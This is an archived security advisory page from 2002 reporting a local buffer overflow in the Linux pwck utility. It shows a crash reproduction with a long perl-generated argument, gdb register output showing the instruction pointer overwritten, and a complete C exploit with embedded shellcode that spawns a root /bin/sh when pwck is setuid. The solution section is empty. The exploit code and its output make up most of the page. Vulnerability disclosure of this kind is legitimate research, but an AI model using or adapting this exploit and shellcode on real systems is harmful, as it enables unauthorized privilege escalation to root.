Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: lnx5667.htm

pwck local buffer overflow



4th Sep 2002 [SBWID-5667]
COMMAND

	
		pwck local buffer overflow
	
	

SYSTEMS AFFECTED

	
		All release?
	
	

PROBLEM

	
		Thanks to Tacettin Karadeniz [tacettinkaradeniz@yahoo.com]  post,  there
		is a locally exploitable buffer overflow in pwck :
		

		 $man pwck

		 =========

		

		pwck verifies the integrity of the  system  authentication  information.
		All  entries  in  the  /etc/passwd  and  /etc/shadow  are   checked   to
		see that the entry has the proper format and valid data in  each  field.
		The user is prompted to delete entries that are improperly  formatted  or
		which have other incorrectable errors. ( man pwck )
		

		

		[CiLeK@karadenizeregli Taci]# /usr/sbin/pwck `perl -e

		'{print"A"x2391}'`

		Segmentation fault (core dumped)

		

		[CiLeK@karadenizeregli Taci]# gdb /usr/sbin/pwck core

		GNU gdb 5.1.1

		This GDB was configured as "i386-mandrake-linux"...

		Core was generated by `/usr/sbin/pwck

		AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

		Program terminated with signal 11, Segmentation fault.

		#0  0x00414141 in ?? ()

		(gdb) info reg

		eax            0x1      1

		ecx            0x4eff4040       1325350976

		edx            0x0      0

		ebx            0x41414141       1094795585

		esp            0xbfffe454       0xbfffe454

		ebp            0x0      0x0

		esi            0xbfffeec4       -1073746236

		edi            0x804cd80        134532480

		eip            0x414141 0x414141

		eflags         0x10286  66182

		

		

		 Exploit code:

		 ============

		

		/* 4 Eylul 2002 /  11:56 :)

		*

		* pwck_exp.c - pwck local buffer overflow exploit

		*

		* pwck  verifies  the integrity of the system

		authentication

		* information.   All  entries   in   the

		/etc/passwd   and

		* /etc/shadow  are  checked  to  see  that the entry

		has the

		* proper format and valid data in each field.  The

		user  is

		* prompted  to  delete entries that are improperly

		formatted

		* or which have other incorrectable errors. ( man

		pwck )

		*

		* By default pwck is not setuid, if +s pwck bingo #

		:)

		*

		* [cilek@karadenizeregli cilek]$ ls -la

		/usr/sbin/pwck

		* -rwsr-sr-x    1 root     root        19544 Feb 23

		2002 /usr/sbin/pwck*

		*

		* Tested on  Mandrake 8.2

		*

		* tacettin@olympos.org

		* tacettinkaradeniz@yahoo.com

		*

		* KDZ.EREGLI @ 2002

		*

		* Not: Shellcode cesitli yazilimlardan elde

		edilmistir. Tamamiyle bana ait degildir.

		*/

		

		#include <stdio.h>

		#include <stdlib.h>

		#include <strings.h>

		#include <unistd.h>

		

		char shellcode[] =

		"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"

		"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"

		"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"

		"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

		

		

		unsigned long get_sp(void)

		

		{

		__asm__("movl %esp, %eax");

		}

		

		int main(int argc, char **argv) {

		

		int bsize  = 2391;

		

		

		unsigned long addr;

		char *buff;

		int i;

		

		if (bsize % 4 != 0) {

		

		bsize = bsize + 4 - (bsize % 4); }

		

		buff  = (char *)malloc(bsize);

		addr  = get_sp();

		system("clear");

		fprintf(stderr, "pwck exploit.....

		tacettin@olympos.org\n\n");

		fprintf(stderr, "Mandrake 8.2 sisteminde test

		edilmistir.\n", addr);

		fprintf(stderr, "Buffer: %d\n", bsize);

		

		

		for(i = 0; i < bsize; i++)

		{

		*(long *)&buff[i] = 0x90;

		}

		*(long *)&buff[bsize - 4] = addr;

		memcpy(buff + bsize - strlen(shellcode) - 8,

		shellcode, strlen(shellcode));

		

		

		execl("/usr/sbin/pwck", "pwck", buff, NULL);

		

		return 0;

		}

		
	
	

SOLUTION

	
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH